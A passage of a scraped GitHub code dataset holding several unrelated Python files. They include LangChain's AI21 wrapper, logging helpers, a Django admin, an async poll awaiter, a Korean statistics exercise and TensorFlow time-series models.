\"\"\"The minimum number of tokens to generate in the completion.\"\"\"\n\n topP: float = 1.0\n \"\"\"Total probability mass of tokens to consider at each step.\"\"\"\n\n presencePenalty: AI21PenaltyData = AI21PenaltyData()\n \"\"\"Penalizes repeated tokens.\"\"\"\n\n countPenalty: AI21PenaltyData = AI21PenaltyData()\n \"\"\"Penalizes repeated tokens according to count.\"\"\"\n\n frequencyPenalty: AI21PenaltyData = AI21PenaltyData()\n \"\"\"Penalizes repeated tokens according to frequency.\"\"\"\n\n numResults: int = 1\n \"\"\"How many completions to generate for each prompt.\"\"\"\n\n logitBias: Optional[Dict[str, float]] = None\n \"\"\"Adjust the probability of specific tokens being generated.\"\"\"\n\n ai21_api_key: Optional[SecretStr] = None\n\n stop: Optional[List[str]] = None\n\n base_url: Optional[str] = None\n \"\"\"Base url to use, if None decides based on model name.\"\"\"\n\n class Config:\n \"\"\"Configuration for this pydantic object.\"\"\"\n\n extra = Extra.forbid\n\n @root_validator()\n def validate_environment(cls, values: Dict) -> Dict:\n \"\"\"Validate that api key exists in environment.\"\"\"\n ai21_api_key = convert_to_secret_str(\n get_from_dict_or_env(values, \"ai21_api_key\", \"AI21_API_KEY\")\n )\n values[\"ai21_api_key\"] = ai21_api_key\n return values\n\n @property\n def _default_params(self) -> Dict[str, Any]:\n \"\"\"Get the default parameters for calling AI21 API.\"\"\"\n return {\n \"temperature\": self.temperature,\n \"maxTokens\": self.maxTokens,\n \"minTokens\": self.minTokens,\n \"topP\": self.topP,\n \"presencePenalty\": self.presencePenalty.dict(),\n \"countPenalty\": self.countPenalty.dict(),\n \"frequencyPenalty\": self.frequencyPenalty.dict(),\n \"numResults\": self.numResults,\n \"logitBias\": self.logitBias,\n }\n\n @property\n def _identifying_params(self) -> Dict[str, Any]:\n \"\"\"Get the identifying parameters.\"\"\"\n return {**{\"model\": self.model}, **self._default_params}\n\n @property\n def _llm_type(self) -> str:\n \"\"\"Return type of llm.\"\"\"\n return \"ai21\"\n\n def _call(\n self,\n prompt: str,\n stop: Optional[List[str]] = None,\n run_manager: Optional[CallbackManagerForLLMRun] = None,\n **kwargs: Any,\n ) -> str:\n \"\"\"Call out to AI21's complete endpoint.\n\n 
Args:\n prompt: The prompt to pass into the model.\n stop: Optional list of stop words to use when generating.\n\n Returns:\n The string generated by the model.\n\n Example:\n .. code-block:: python\n\n response = ai21(\"Tell me a joke.\")\n \"\"\"\n if self.stop is not None and stop is not None:\n raise ValueError(\"`stop` found in both the input and default params.\")\n elif self.stop is not None:\n stop = self.stop\n elif stop is None:\n stop = []\n if self.base_url is not None:\n base_url = self.base_url\n else:\n if self.model in (\"j1-grande-instruct\",):\n base_url = \"https://api.ai21.com/studio/v1/experimental\"\n else:\n base_url = \"https://api.ai21.com/studio/v1\"\n params = {**self._default_params, **kwargs}\n self.ai21_api_key = cast(SecretStr, self.ai21_api_key)\n response = requests.post(\n url=f\"{base_url}/{self.model}/complete\",\n headers={\"Authorization\": f\"Bearer {self.ai21_api_key.get_secret_value()}\"},\n json={\"prompt\": prompt, \"stopSequences\": stop, **params},\n )\n if response.status_code != 200:\n optional_detail = response.json().get(\"error\")\n raise ValueError(\n f\"AI21 /complete call failed with status code {response.status_code}.\"\n f\" Details: {optional_detail}\"\n )\n response_json = response.json()\n return response_json[\"completions\"][0][\"data\"][\"text\"]\n","repo_name":"langchain-ai/langchain","sub_path":"libs/community/langchain_community/llms/ai21.py","file_name":"ai21.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":68990,"dataset":"github-code","pt":"7"}
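A minimal usage sketch for the AI21 wrapper above, mirroring its own docstring example; "my-api-key" is a placeholder, and the call performs a real HTTP request, so it only succeeds with a valid key (or AI21_API_KEY set in the environment).

from langchain_community.llms import AI21

# Placeholder credentials; model name comes from the class default options.
llm = AI21(ai21_api_key="my-api-key", model="j2-jumbo-instruct", maxTokens=64)
print(llm.invoke("Tell me a joke."))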
+{"seq_id":"6666604706","text":"# -*- coding:utf-8 -*-\r\n\"\"\" Provide log related functions. You need to Initialize the logger and use the logger to make logs.\r\n\r\nExample:\r\n\r\n>>> logger = Initialize()\r\n\r\nUse logger.level(\\*msg) to log like:\r\n\r\n>>> logger.error(\"Pickle data writing Failed.\")\r\n\r\n>>> logger.info(\"Pickle data of \", foo, \" written successfully.\")\r\n\r\nThe log will be stored into LogFile.log by default.\r\n\"\"\"\r\n\r\n__author__ = \"Wang Hewen\"\r\n\r\nimport sys\r\nimport logging\r\n\r\nlogging.currentframe = lambda: sys._getframe(5)\r\nclass Logger(logging.Logger):\r\n def debug(self, *args, **kwargs):\r\n super().log(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def info(self, *args, **kwargs):\r\n super().info(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def warning(self, *args, **kwargs):\r\n super().warning(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def warn(self, *args, **kwargs):\r\n super().warn(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def error(self, *args, **kwargs):\r\n super().error(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def exception(self, *args, exc_info=True, **kwargs):\r\n super().exception(\"\".join([str(arg) for arg in args]), exc_info = exc_info, **kwargs)\r\n\r\n def critical(self, *args, **kwargs):\r\n super().critical(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def log(self, level, *args, **kwargs):\r\n super().log(level, \"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):\r\n super()._log(level, msg, args, exc_info=None, extra=None, stack_info=False)\r\n\r\n\r\ndef Initialize(FileName = \"LogFile.log\", LogLevel = \"INFO\", WriteToStream = False):\r\n '''\r\nInitialize loggers for logging. 
A logger will be returned.\r\n\r\n:param String FileName: Path of the log file\r\n:param String LogLevel: LogLevel of the logger, which can be \"DEBUG\", \"INFO\", \"ERROR\"\r\n:param Boolean WriteToStream: Whether to write to stdout\r\n:return: logger: The logger used for logging\r\n:rtype: logging.Logger\r\n '''\r\n if LogLevel not in [\"DEBUG\", \"INFO\", \"ERROR\"]:\r\n raise ValueError(\"LogLevel is not correctly set.\")\r\n logging.Logger.manager.setLoggerClass(Logger)\r\n logger = logging.getLogger(__name__) #__name__ == CommonModules.Log\r\n handlers = logger.handlers[:]\r\n for handler in handlers:\r\n handler.close()\r\n logger.removeHandler(handler)\r\n fileHandler = logging.FileHandler(FileName)\r\n fileHandler.setFormatter(logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s', datefmt = '%Y/%m/%d %H:%M:%S'))\r\n if LogLevel == \"DEBUG\":\r\n streamHandler = logging.StreamHandler(stream = sys.stdout)\r\n streamHandler.setLevel(logging.DEBUG)\r\n fileHandler.setLevel(logging.DEBUG)\r\n logger.setLevel(logging.DEBUG)\r\n if LogLevel == \"INFO\":\r\n streamHandler = logging.StreamHandler(stream = sys.stdout)\r\n streamHandler.setLevel(logging.INFO)\r\n fileHandler.setLevel(logging.INFO)\r\n logger.setLevel(logging.INFO)\r\n if LogLevel == \"ERROR\":\r\n streamHandler = logging.StreamHandler(stream = sys.stderr)\r\n streamHandler.setLevel(logging.ERROR)\r\n fileHandler.setLevel(logging.ERROR)\r\n logger.setLevel(logging.ERROR)\r\n\r\n streamHandler.setFormatter(logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s', datefmt = '%Y/%m/%d %H:%M:%S'))\r\n if WriteToStream:\r\n logger.addHandler(streamHandler) \r\n logger.addHandler(fileHandler)\r\n return logger\r\n","repo_name":"wanghewen/CommonModules","sub_path":"CommonModules/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
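A short usage sketch for the logging module above: `Initialize` returns the customized logger, and each level method stringifies and concatenates its positional arguments into one message ("app.log" is a placeholder file name).

from CommonModules.Log import Initialize

logger = Initialize(FileName="app.log", LogLevel="DEBUG", WriteToStream=True)
# The Logger subclass joins all positional arguments into a single string.
logger.info("Pickle data of ", {"rows": 10}, " written successfully.")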
+{"seq_id":"14840831355","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.feature_selection import RFE\n\n\ndef rfe(X: np.array, y: np.array, n_features_to_select: int = 3):\n \"\"\"\n Performs recursive feature elimination\n\n Args:\n - X: Input numpy array (train_data)\n - y: Input numpy array (train_data labels)\n - n_features_to_select: number of features to keep\n\n Returns:\n - X_transformed: Output numpy array (with columns filtered)\n - y: numpy array (train_data labels)\n - rfe: fitted RFE object\n \"\"\"\n model = LinearRegression()\n rfe = RFE(\n estimator=model,\n n_features_to_select=n_features_to_select\n )\n\n rfe.fit(X, y)\n X_transformed = rfe.transform(X)\n return X_transformed, y, rfe","repo_name":"alanchn31/ML-ToolBox","sub_path":"supervised/feature_selection/rfe.py","file_name":"rfe.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6540510959","text":"from django.contrib import admin\nfrom .models import factura, codigoFinanciero\nfrom import_export.admin import ImportExportModelAdmin\n\n\nadmin.site.site_header = \"Gestion Pilar\"\nadmin.site.site_title = \"Gestion Pilar\"\n\n\n\n\n\n@admin.register(codigoFinanciero)\nclass codigoFinancieroAdmin(ImportExportModelAdmin):\n list_display= ('codigo',)\n\n@admin.register(factura)\nclass facturaAdmin(ImportExportModelAdmin):\n list_display=('emision', 'nroFactura', 'proveedor', 'total', 'objeto')\n\n\n def get_queryset(self, request):\n\n # Obtener el usuario actualmente autenticado\n user = request.user\n\n # Obtener el nombre del grupo al que pertenece el usuario\n user_group_name = user.groups.first().name if user.groups.exists() else None\n\n # Inicializar el queryset con todas las facturas\n queryset = super().get_queryset(request)\n\n # Filtrar las facturas por el nombre del grupo del usuario\n if user_group_name:\n queryset = queryset.filter(codigo__codigo=user_group_name)\n\n return queryset\n","repo_name":"Excel-ente/facturas","sub_path":"facturas/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70078597985","text":"# -*- coding: utf-8 -*-\nimport errno\n\nfrom .poll import POLL_READ, POLL_WRITE, POLL_ERROR, POLL_DISCONNECT\nfrom .error import BrokenPipeError, ConnectionError\nfrom ..future import FutureSourcePair, FutureCanceled, RaisedFuture, CompletedFuture\n\n__all__ = ('PollAwaiter',)\n#------------------------------------------------------------------------------#\n# Poll Awaiter #\n#------------------------------------------------------------------------------#\nclass PollAwaiter (object):\n \"\"\"File await object\n \"\"\"\n __slots__ = ('fd', 'poller', 'mask', 'entries',)\n\n def __init__ (self, fd, poller):\n self.fd = fd\n self.poller = poller\n\n # state\n self.mask = 0\n self.entries = []\n\n #--------------------------------------------------------------------------#\n # Await #\n #--------------------------------------------------------------------------#\n def Await (self, mask, cancel = None):\n \"\"\"Await event specified by mask argument\n \"\"\"\n if mask is None:\n self.Dispose (BrokenPipeError (errno.EPIPE, 'Detached from core'))\n return CompletedFuture (None)\n elif not mask:\n return RaisedFuture (ValueError ('Empty event mask'))\n elif mask & self.mask:\n return RaisedFuture (ValueError ('Intersecting event mask: {}'.format (self)))\n\n # source\n future, source = FutureSourcePair ()\n if cancel:\n def cancel_cont (result, error):\n self.dispatch (mask)\n source.TrySetCanceled ()\n cancel.Await ().OnCompleted (cancel_cont)\n\n # register\n if self.mask:\n self.poller.Modify (self.fd, self.mask | mask)\n else:\n self.poller.Register (self.fd, mask)\n\n # update state\n self.mask |= mask\n self.entries.append ((mask, source))\n\n return future\n\n #--------------------------------------------------------------------------#\n # Resolve #\n #--------------------------------------------------------------------------#\n def Resolve (self, event):\n \"\"\"Resolve pending events effected by specified event mask\n \"\"\"\n if event & ~POLL_ERROR:\n for source in self.dispatch (event):\n source.TrySetResult (event)\n\n else:\n error = BrokenPipeError (errno.EPIPE, 'Broken pipe') if event & POLL_DISCONNECT else \\\n ConnectionError ()\n for source in self.dispatch (self.mask):\n source.TrySetException (error)\n\n #--------------------------------------------------------------------------#\n # Private #\n #--------------------------------------------------------------------------#\n def dispatch (self, event):\n \"\"\"Dispatch sources effected by specified event mask\n \"\"\"\n entries, effected = [], []\n\n # find effected\n for mask, source in self.entries:\n if mask & event:\n effected.append (source)\n else:\n entries.append ((mask, source))\n\n # update state\n self.mask &= ~event\n self.entries = entries\n\n if self.mask:\n self.poller.Modify (self.fd, self.mask)\n else:\n self.poller.Unregister (self.fd)\n\n return effected\n\n def __str__ (self):\n \"\"\"String representation\n \"\"\"\n events = []\n self.mask & POLL_READ and events.append ('read')\n self.mask & POLL_WRITE and events.append ('write')\n self.mask & POLL_ERROR and events.append ('error')\n return ''.format (self.fd, ','.join (events), id (self))\n __repr__ = __str__\n\n #--------------------------------------------------------------------------#\n # Disposable #\n #--------------------------------------------------------------------------#\n def Dispose (self, error = None):\n \"\"\"Dispose file and resolve all pending events with specified error\n \"\"\"\n error = error or 
FutureCanceled ('File await object has been disposed')\n\n for source in self.dispatch (self.mask):\n source.TrySetException (error)\n\n def __enter__ (self):\n return self\n\n def __exit__ (self, et, eo, tb):\n self.Dispose ()\n return False\n\n# vim: nu ft=python columns=120 :\n","repo_name":"aslpavel/async","sub_path":"core/poll_await.py","file_name":"poll_await.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14527919740","text":"class Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n \"\"\"\n Given a list of integers and an integer, remove any\n list entries which are equal to that integer in-place\n and return the number of remaining entries as an int.\n \"\"\"\n\n index = 0 \n while index < len(nums):\n # if same as value, remove\n if nums[index] == val:\n nums.pop(index)\n # if different, move onto next\n else:\n index += 1\n \n return index","repo_name":"Foggalong/leetcode","sub_path":"problems/remove_element/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37153552840","text":"# 다음 데이터는 동일한 상품의 포장지 색상에 따른 매출액에 대한 자료이다.\n# 포장지 색상에 따른 제품의 매출액에 차이가 존재하는지 two-sample t-검정을 하시오.\n'''\nimport numpy as np\nimport scipy.stats as stats\n\nblue = [70, 68, 82, 78, 72, 68, 67, 68, 88, 60, 80]\nred = [60, 65, 55, 58, 67, 59, 61, 68, 77, 66, 66]\n\n# 귀무: 포장지 색상에 따른 제품의 매출액에 차이가 없다.\n# 대립: 포장지 색상에 따른 제품의 매출액에 차이가 있다.\n\nprint(np.mean(blue)) # 72.8\nprint(np.mean(red)) # 63.8\n\ntwo_sample = stats.ttest_ind(blue, red)\nprint(two_sample)\n# Ttest_indResult(statistic=2.9280203225212174, pvalue=0.008316545714784403)\n# pvalue=0.008316 < 0.05 이므로 귀무가설 기각!\n# 포장지 색상에 따른 제품의 매출액에 차이가 있다.\n'''\n\n# 남아 신생아 몸무게의 평균 검정을 수행하려고 한다.\n# 파일명 : babyboom.csv (testdata 폴더에 있음) # 1:여아, 2:남아 \n\n# 남아 신생아의 몸무게는 평균이 3000(g)으로 알려져 왔으나 이것이 틀렸다는 주장이 나왔다.\n# 표본으로 남아를 뽑아 체중을 측정하였다고 할 때 새로운 주장이 맞는지 검정하시오.\n\n# 귀무 : 남아 신생아의 몸무게는 평균이 3000(g) 이다.\n# 대립 : 남아 신생아의 몸무게는 평균이 3000(g)이 아니다.\n\"\"\"\nimport numpy as np\nimport scipy.stats as stats\nimport pandas as pd\n\ndata = pd.read_csv('../testdata/babyboom.csv')\nprint(data.head(3),len(data)) # 44\nprint(data.isnull().sum()) # 결측치 0 개\nbdata = data[data['gender'] == 2]\nprint(bdata.head(3), len(bdata)) # 남아의 수는 26\nprint(np.mean(bdata.weight)) # 3375.30\n\nprint(stats.shapiro(bdata.weight)) # pvalue=0.2022 정규성 만족 \n\nprint(stats.ttest_1samp(bdata.weight, popmean= 3000))\n# Ttest_1sampResult(statistic=4.47078356044109, pvalue=0.00014690296107439875)\n# pvalue=0.0001469 < 0.05 이므로 귀무가설 기각\n\"\"\"\n\n# 에이콘 주식회사에서 영업사원들의 '지각횟수'와 '판매횟수' 간에 관계가 있는지 알아보려고 한다.\n# 영업사원 5명을 대상으로 한 달 동안 '지각횟수'와 '판매횟수'를 조사했더니 아래와 같은 결과를 얻었다.\n# 둘 사이의 상관계수를 출력하고 상관관계가 있는지 설명하시오.\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n# 지각횟수(x) = 1,2,3,4,5\n# 판매횟수(y) = 8,7,6,4,5\n\ndf = pd.DataFrame({'late':(1,2,3,4,5),'sale':(8,7,6,4,5)})\nprint(df.corr(method='pearson'))\nprint(np.corrcoef(df.late, df.sale))\n\"\"\"\n\n# 소득 수준에 따른 외식 성향을 나타내고 있다. 주말 저녁에 외식을 하면 1, 외식을 하지 않으면 0으로 처리되었다.\n# 'eat_out.txt' 데이터에 대하여 소득 수준이 외식에 영향을 미치는지 로지스틱 회귀분석을 실시한다.\n# ① 소스 코드와 모델의 분류정확도를 출력하시오.\n# ② 키보드로 소득 수준(양의 정수)을 입력하면 외식 여부 분류 결과 출력하시오.\n\n# 조건1 : 모델 생성은 glm 함수를 사용하도록 한다.\n# 조건2 : 키보드로 입력할 소득 수준 값은 45로 한다.\n\nimport pandas as pd\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\n\ndata = pd.read_csv('../testdata/last_test.csv')\nprint(data)\neatout = data[(data.요일 == '토')| (data.요일 == '일')]\nprint(eatout)\n\nformula = '외식유무 ~ 소득수준'\nresult = smf.glm(formula = formula, data = eatout, family = sm.families.Binomial()).fit() # binomial 을 넣기 때문에 이항분포가 된다\nprint(result)\nprint(result.summary())\n\npred = result.predict(eatout)\nprint('정확도: ', accuracy_score(eatout['외식유무'], np.around(pred)))\n\nkey = int(input('소득 수준 입력 : 45를 눌러주세요...'))\nnewdf = pd.DataFrame({'소득수준':[key]})\npred2 = result.predict(newdf)\nprint(np.rint(pred2.values))\n","repo_name":"tyler-0331/python","sub_path":"pypro3/anal5/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"368841172","text":"import logging\nimport sys\nimport warnings\nimport numpy as np\n\nglobal logger\nlogger = logging.getLogger('simnibs')\nsh = logging.StreamHandler()\nformatter = logging.Formatter('[ %(name)s ]%(levelname)s: %(message)s')\nsh.setFormatter(formatter)\nsh.setLevel(logging.INFO)\nlogger.addHandler(sh)\nlogger.setLevel(logging.DEBUG)\nlogging.addLevelName(25, 'SUMMARY')\n\n\ndef log_warnings(message, category, filename, lineno, file=None, line=None):\n logger.warn(warnings.formatwarning(message, category, filename, lineno))\n\n\n# This is causing errors in pytest\n#warnings.showwarning = log_warnings\n\n\ndef register_excepthook(logger):\n def log_excep(exc_type, exc_value, exc_traceback):\n if issubclass(exc_type, KeyboardInterrupt):\n sys.__excepthook__(exc_type, exc_value, exc_traceback)\n return\n logger.debug(\n \"Traceback\",\n exc_info=(exc_type, exc_value, exc_traceback)\n )\n logger.critical(\n \"Uncaught exception\",\n exc_info=(exc_type, exc_value, None)\n )\n sys.excepthook = log_excep\n\n\ndef unregister_excepthook():\n sys.excepthook = sys.__excepthook__\n\n\ndef format_time(running_time):\n \"\"\"Format time in seconds as hours:minutes:seconds.\n \n PARAMETERS\n ----------\n running_time : float\n Time in seconds.\n \n RETURNS\n ----------\n running_time : str\n The time formatted as hours:minutes:seconds.\n \"\"\"\n hrs = np.uint16(np.floor(running_time/(60.**2)))\n mts = np.uint16(np.floor(running_time/60.-hrs*60))\n sec = np.uint16(np.round(running_time-hrs*60.**2-mts*60.))\n\n return \"{:02d}:{:02d}:{:02d}\".format(hrs,mts,sec)","repo_name":"simnibs/simnibs","sub_path":"simnibs/utils/simnibs_logger.py","file_name":"simnibs_logger.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"7"}
+{"seq_id":"31785380706","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom dataset import WindowGenerator\n\n\nclass Baseline(tf.keras.Model):\n def __init__(self, label_index=None):\n super().__init__()\n self.label_index = label_index\n\n def call(self, inputs):\n if self.label_index is None:\n return inputs\n result = inputs[:, :, self.label_index]\n return result[:, :, tf.newaxis]\n\n\nclass MultiStepLastBaseline(tf.keras.Model):\n def call(self, inputs):\n return tf.tile(inputs[:, -1:, :], [1, OUT_STEPS, 1])\n\n\nclass RepeatBaseline(tf.keras.Model):\n def call(self, inputs):\n return inputs\n\n\nclass ResidualWrapper(tf.keras.Model):\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n def call(self, inputs, *args, **kwargs):\n delta = self.model(inputs, *args, **kwargs)\n # The prediction for each timestep is the input\n # from the previous time step plus the delta\n # calculated by the model.\n return inputs + delta\n\n\nclass FeedBack(tf.keras.Model):\n def __init__(self, units, out_steps):\n super().__init__()\n self.out_steps = out_steps\n self.units = units\n self.lstm_cell = tf.keras.layers.LSTMCell(units)\n # Also wrap the LSTMCell in an RNN to simplify the `warmup` method.\n self.lstm_rnn = tf.keras.layers.RNN(self.lstm_cell, return_state=True)\n self.dense = tf.keras.layers.Dense(num_features)\n\n def warmup(self, inputs):\n # inputs.shape => (batch, time, features)\n # x.shape => (batch, lstm_units)\n x, *state = self.lstm_rnn(inputs)\n # predictions.shape => (batch, features)\n prediction = self.dense(x)\n return prediction, state\n\n def call(self, inputs, training=None):\n # Use a TensorArray to capture dynamically unrolled outputs.\n predictions = []\n # Initialize the lstm state\n prediction, state = self.warmup(inputs)\n # Insert the first prediction\n predictions.append(prediction)\n\n # Run the rest of the prediction steps\n for n in range(1, self.out_steps):\n # Use the last prediction as input.\n x = prediction\n # Execute one lstm step.\n x, state = self.lstm_cell(x, states=state, training=training)\n # Convert the lstm output to a prediction.\n prediction = self.dense(x)\n # Add the prediction to the output\n predictions.append(prediction)\n\n # predictions.shape => (time, batch, features)\n predictions = tf.stack(predictions)\n # predictions.shape => (batch, time, features)\n predictions = tf.transpose(predictions, [1, 0, 2])\n return predictions\n\n\ndef compile_and_fit(model, window, patience=8):\n early_stopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=patience,\n mode='min')\n model.compile(loss=tf.losses.MeanSquaredError(),\n optimizer=tf.optimizers.Adam(),\n metrics=[tf.metrics.MeanAbsoluteError()])\n history = model.fit(window.train, epochs=MAX_EPOCHS,\n validation_data=window.val,\n callbacks=[early_stopping])\n model.save(filepath='tmp/model/')\n return history\n\n\ndef plot_experiments(metric_idx, val_loss, train_loss, train_accs, val_accs, test_accs):\n x = np.arange(len(train_loss))\n val_mae = [v[metric_idx] for v in val_loss.values()]\n test_mae = [v[metric_idx] for v in train_loss.values()]\n\n plt.ylabel('mean_absolute_error [DIJA, normalized]')\n plt.bar(x - 0.17, val_mae, 0.3, label='Validation')\n plt.bar(x + 0.17, test_mae, 0.3, label='Test')\n plt.xticks(ticks=x, labels=train_loss.keys(), rotation=45)\n _ = plt.legend()\n plt.show()\n\n train_acc = [v for v in train_accs.values()]\n val_acc = [v for v in val_accs.values()]\n test_acc = [v for v in 
test_accs.values()]\n plt.ylabel('binary accuracy')\n plt.bar(x - 0.23, train_acc, 0.2, label='Train')\n plt.bar(x, val_acc, 0.2, label='Validation')\n plt.bar(x + 0.23, test_acc, 0.2, label='Test')\n plt.xticks(ticks=x, labels=train_loss.keys(), rotation=45)\n _ = plt.legend()\n plt.show()\n\n\ndef train_and_evaluate(model, window, plot_window, name):\n if name == 'Baseline' or name == 'Last' or name == 'Repeat':\n model.compile(loss=tf.losses.MeanSquaredError(), metrics=[tf.metrics.MeanAbsoluteError()])\n else:\n compile_and_fit(model=model, window=window)\n val_performance[name] = model.evaluate(window.val)\n performance[name] = model.evaluate(window.test, verbose=0)\n train_acc[name] = window.binary_accuracy(model=model, ds='train')\n val_acc[name] = window.binary_accuracy(model=model, ds='val')\n test_acc[name] = window.binary_accuracy(model=model, ds='test')\n plot_window.plot(name=name, model=model, acc=test_acc[name])\n\n\ndef run_single_step_models():\n baseline = Baseline(label_index=0)\n train_and_evaluate(baseline, single_step_window, wide_window, 'Baseline')\n\n linear = tf.keras.Sequential([tf.keras.layers.Dense(units=1)])\n train_and_evaluate(linear, single_step_window, wide_window, 'Linear')\n\n\n # dense = tf.keras.Sequential([\n # tf.keras.layers.Dense(units=64, activation='relu'),\n # tf.keras.layers.Dense(units=1)\n # ])\n # train_and_evaluate(dense, single_step_window, wide_window, 'Dense')\n\n # multi_step_dense = tf.keras.Sequential([\n # # Shape: (time, features) => (time*features)\n # tf.keras.layers.Flatten(),\n # tf.keras.layers.Dense(units=32, activation='relu'),\n # tf.keras.layers.Dense(units=1),\n # # Add back the time dimension.\n # # Shape: (outputs) => (1, outputs)\n # tf.keras.layers.Reshape([1, -1]),\n # ])\n # train_and_evaluate(multi_step_dense, conv_window, conv_window, 'Multi-step dense')\n #\n # conv_model = tf.keras.Sequential([\n # tf.keras.layers.Conv1D(filters=16,\n # kernel_size=(CONV_WIDTH,),\n # activation='relu'),\n # tf.keras.layers.Dense(units=16, activation='relu'),\n # tf.keras.layers.Dense(units=1),\n # ])\n # train_and_evaluate(conv_model, conv_window, wide_conv_window, 'Conv')\n #\n # lstm_model = tf.keras.models.Sequential([\n # # Shape [batch, time, features] => [batch, time, lstm_units]\n # tf.keras.layers.LSTM(32, return_sequences=True),\n # # Shape => [batch, time, features]\n # tf.keras.layers.Dense(units=1)\n # ])\n # train_and_evaluate(lstm_model, wide_window, wide_window, 'LSTM')\n\n metric_idx = baseline.metrics_names.index('mean_absolute_error')\n return metric_idx\n\n\ndef run_multi_output_models():\n baseline = Baseline(label_index=0)\n train_and_evaluate(baseline, single_step_window, wide_window, 'Baseline Multi-out')\n\n dense = tf.keras.Sequential([\n tf.keras.layers.Dense(units=64, activation='relu'),\n tf.keras.layers.Dense(units=64, activation='relu'),\n tf.keras.layers.Dense(units=num_features)\n ])\n train_and_evaluate(dense, single_step_window, wide_window, 'Dense Multi-out')\n\n lstm_model = tf.keras.models.Sequential([\n # Shape [batch, time, features] => [batch, time, lstm_units]\n tf.keras.layers.LSTM(32, return_sequences=True),\n # Shape => [batch, time, features]\n tf.keras.layers.Dense(units=num_features)\n ])\n train_and_evaluate(lstm_model, wide_window_multi_out, wide_window, 'LSTM Multi-out')\n\n residual_lstm = ResidualWrapper(\n tf.keras.Sequential([\n tf.keras.layers.LSTM(32, return_sequences=True),\n tf.keras.layers.Dense(\n num_features,\n # The predicted deltas should start small\n # So initialize 
the output layer with zeros\n kernel_initializer=tf.initializers.zeros())\n ]))\n train_and_evaluate(residual_lstm, wide_window_multi_out, wide_window, 'Residual LSTM Multi-out')\n\n metric_idx = baseline.metrics_names.index('mean_absolute_error')\n return metric_idx\n\n\ndef run_multi_step_models():\n last_baseline = MultiStepLastBaseline()\n train_and_evaluate(last_baseline, multi_window, multi_window, 'Last')\n\n repeat_baseline = RepeatBaseline()\n train_and_evaluate(repeat_baseline, multi_window, multi_window, 'Repeat')\n\n multi_linear_model = tf.keras.Sequential([\n # Take the last time-step.\n # Shape [batch, time, features] => [batch, 1, features]\n tf.keras.layers.Lambda(lambda x: x[:, -1:, :]),\n # Shape => [batch, 1, out_steps*features]\n tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # Shape => [batch, out_steps, features]\n tf.keras.layers.Reshape([OUT_STEPS, num_features])\n ])\n train_and_evaluate(multi_linear_model, multi_window, multi_window, 'Linear Multi')\n\n # multi_dense_model = tf.keras.Sequential([\n # # Take the last time step.\n # # Shape [batch, time, features] => [batch, 1, features]\n # tf.keras.layers.Lambda(lambda x: x[:, -1:, :]),\n # # Shape => [batch, 1, dense_units]\n # tf.keras.layers.Dense(512, activation='relu'),\n # # Shape => [batch, out_steps*features]\n # tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # # Shape => [batch, out_steps, features]\n # tf.keras.layers.Reshape([OUT_STEPS, num_features])\n # ])\n # train_and_evaluate(multi_dense_model, multi_window, multi_window, 'Dense Multi')\n #\n # multi_conv_model = tf.keras.Sequential([\n # # Shape [batch, time, features] => [batch, CONV_WIDTH, features]\n # tf.keras.layers.Lambda(lambda x: x[:, -CONV_WIDTH:, :]),\n # # Shape => [batch, 1, conv_units]\n # tf.keras.layers.Conv1D(1024, activation='relu', kernel_size=CONV_WIDTH),\n # # Shape => [batch, 1, out_steps*features]\n # tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # # Shape => [batch, out_steps, features]\n # tf.keras.layers.Reshape([OUT_STEPS, num_features])\n # ])\n # train_and_evaluate(multi_conv_model, multi_window, multi_window, 'Conv Multi')\n #\n # multi_lstm_model = tf.keras.Sequential([\n # # Shape [batch, time, features] => [batch, lstm_units]\n # # Adding more `lstm_units` just overfits more quickly.\n # tf.keras.layers.LSTM(32, return_sequences=False),\n # # Shape => [batch, out_steps*features]\n # tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # # Shape => [batch, out_steps, features]\n # tf.keras.layers.Reshape([OUT_STEPS, num_features])\n # ])\n # train_and_evaluate(multi_lstm_model, multi_window, multi_window, 'LSTM Multi')\n #\n # feedback_model 